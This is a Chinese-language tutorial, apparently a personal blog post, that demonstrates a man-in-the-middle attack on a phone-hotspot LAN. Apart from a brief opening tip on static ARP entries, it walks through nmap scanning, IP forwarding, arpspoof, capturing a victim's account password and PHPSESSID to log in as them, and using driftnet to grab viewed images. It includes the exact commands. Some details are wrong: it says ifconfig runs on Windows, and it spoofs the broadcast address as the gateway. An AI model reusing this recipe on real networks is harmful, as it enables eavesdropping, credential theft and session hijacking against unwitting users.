在一個局域網內在沒有進行加密盜取監控你和帳號密碼是一個非常簡單實現的,預防ARP欺騙
預防
- 預防ARP欺騙
他默認是動態的通常的不在意網關ip的
設置成靜態的就可以簡單預防ARP欺騙了
實驗用的系統和工具
-
工具Nmap,Arpspoof,Driftnet和 Wireshark
-
命令
命令1:在linux系統裏ifconfig顯示或配置網絡設備
命令2:在winodws裏ifconfig顯示或配置網絡設備 -
攻擊端kali linux系統
Linux版的 kali linux是一個專門進行滲透安全做的
是黑客必不可少的工具之一
kali有幾千個工具比如著名的列:
掃描大王:Nmap
Nmap在《黑客帝國》和《諜影重重:極限伯恩》等等電影裏也出現過
學習書《Nmap 參考指南 》
sql注入利器:sqlmap
學習書《sqlmap入門到精通》
神兵利器:msf
學習書《Metasploit滲透測試指南》
抓包工具:wire shark
學習書《Wireshark網絡分析的藝術》《網絡協議分析》
瑞士軍刀:burp suite
學習書《BurpSuite 實戰指南》
。。。。。。。。。
還有很多就不多說了 -
客戶端winxp系統
微軟開發windowsxp,windows2000,windows7,windows10.windows2003大家都在用windows就不多介紹了
-
配置查看
kali查看ip和網關ifconfig
winxp查看ip和網關ipconfi
開始演示局域網密碼盜竊
-
用kali裏的nmap工具進行局域網掃描
nmap -sP 192.168.43.0/24
可以看見他存活這ip是192.168.43.218
英文不好的我果斷翻譯一下
MAC地址是小米的
我用的是小米手機開的熱點電腦連接的
-
先進行進行IP流量轉發不然被黑的xp系統網絡就不能用了
echo 1 > /proc/sys/net/ipv4/ip_forward
-
arp欺騙
kali現在沒有默認安裝arpspoof需要自己下載apt-get install dsniff ssldump
下載
-
轉發數據包
arpspoof -i wlan0 -t 192.168.43.218 192.168.43.255
-
客戶端登陸帳號密碼
-
攻擊端的我就可以查看你所有客戶端操作的過程
帳號密碼已經被抓取
-
拿到PHPSESSID
-
登陸
登陸成功
-
抓取客戶端照片
kali現在需要下載 Driftnetapt-get install driftnet
下載完成
開始抓取網卡流過的照片driftnet -i wlan0
客戶端比如在訪問照片
攻擊端的我用Driftnet進行抓取照片driftnet -i wlan0
可以自己照片已經被抓取到了
-
抓取qq聊天記錄
哈哈哈哈哈哈哈哈哈哈就不要想了被加密了